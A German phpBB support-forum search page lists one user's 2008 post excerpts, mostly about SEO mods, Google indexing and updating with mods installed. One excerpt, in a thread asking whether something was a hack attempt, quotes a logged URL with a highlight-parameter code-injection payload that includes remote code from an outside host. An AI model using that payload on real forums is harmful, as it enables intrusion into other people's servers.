Die Suche ergab 10 Treffer

von neuer
03.05.2008 19:42
Forum: phpBB 2.0: Administration, Benutzung und Betrieb
Thema: Ich denke dass wahr ein Hackversuch
Antworten: 5
Zugriffe: 889

Wenn ich das richtig sehe versuchte das Script, einen alten Fehler in der highlight auszunutzen, doch die Lücke wurde bereits bei einem updatet geschlossen, das zeigt mal wieder wie wichtig Updates sind. :) Solche Angriffe laufen meist automatisiert ab und erzeugen somit immer ein Hintergrundrausch...
von neuer
03.05.2008 19:37
Forum: phpBB 2.0: Mods in Entwicklung
Thema: SEO Urls V2
Antworten: 1747
Zugriffe: 288215

also ich wollt nur mal daaaaaaaaaanke sagen. seit dem ich den seo mod drinn habe fällt google über mein forum her wie nichts gutes und indexiert es genau so wie es seien soll. einfach nur klasse, genial oder einfach geile sache dat ;) !!!!!!!! ps: habe meta title auch drinn. google hat mich schon fa...
von neuer
03.05.2008 09:30
Forum: phpBB 2.0: Administration, Benutzung und Betrieb
Thema: Ich denke dass wahr ein Hackversuch
Antworten: 5
Zugriffe: 889

ok dank dir!!!


wäre es nicht eigentlich besser die bots schon mit der htaccess auszusperren????
von neuer
01.05.2008 18:46
Forum: phpBB 2.0: Administration, Benutzung und Betrieb
Thema: Ich denke dass wahr ein Hackversuch
Antworten: 5
Zugriffe: 889

Ich denke dass wahr ein Hackversuch

Vielleicht kann mir das mal jemand erklären und mir die ganze geschicht interpretieren. also gefundene url im cback wahr: einmal so: http://www.mein-forum.de//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://-censored-.biz/dur...
von neuer
01.05.2008 14:30
Forum: phpBB 2.0: Mod Support
Thema: Album Mod - SEO?
Antworten: 5
Zugriffe: 1029

lol ja aber ich dachte falls nochmal jemand sucht hadder auch gleich die antwort, irgendwie hasse ich threads bei denen am ende nichts bei rumkommt.

grüsse neuer
von neuer
13.04.2008 09:39
Forum: phpBB 2.0: Mod Suche/Anfragen
Thema: GooGle ist falsch eigentlich Grr.de müsste es heissen HILFE
Antworten: 0
Zugriffe: 394

GooGle ist falsch eigentlich Grr.de müsste es heissen HILFE

Ich habe also den SeoMod V2 erfolgreich eingebaut und habe auch das addon für den doppelten content eingebaut usw. dann spidert auch google meine webseite erfolgreich mit den Url's: http://www.meinforum/forumsowieso12.html das ging jetzt eine woche gut und jetzt hat er sie komplett aus dem Index ges...
von neuer
12.04.2008 19:09
Forum: phpBB 2.0: Installation und Update
Thema: angst vor update ;)
Antworten: 4
Zugriffe: 1510

jo vielen dank so in etwa hatte ich mir dass schon gedacht. nur ist das mit der db immer sehr quälend weil es ein ziemlich großes forum ist.

na dann hoffen wir mal das nichts schief geht LOL
von neuer
12.04.2008 18:28
Forum: phpBB 2.0: Installation und Update
Thema: angst vor update ;)
Antworten: 4
Zugriffe: 1510

angst vor update ;)

Ich bin ehrlich ich will eigentlich auf die neue 2er version updaten habe aber jetzt schon einige Mods eingebaut und habe angst das wenn ich das update jetzt draufspiele das diese dann weg oder unbrauchbar werden. bei den vorrigen updates hatte ich nicht das Problem da ich vorher keine Mods drauf ha...
von neuer
12.04.2008 16:23
Forum: phpBB 2.0: Mod Suche/Anfragen
Thema: Addon für Seo V2 EDIT: erledigt
Antworten: 0
Zugriffe: 325

Addon für Seo V2 EDIT: erledigt

Hallo nach umfangreiche nutzung der suche habe ich leider nichts gefunden. Ich nutze den Seo V2 erfolgreich und gut bei google gelistet aber da gibt es eine sache die mich dennoch sehr stört. Ich hätte gern den Title des jeweiligem Themas auch mit dabei. D.h. <link rel="top" href="./i...

Zur erweiterten Suche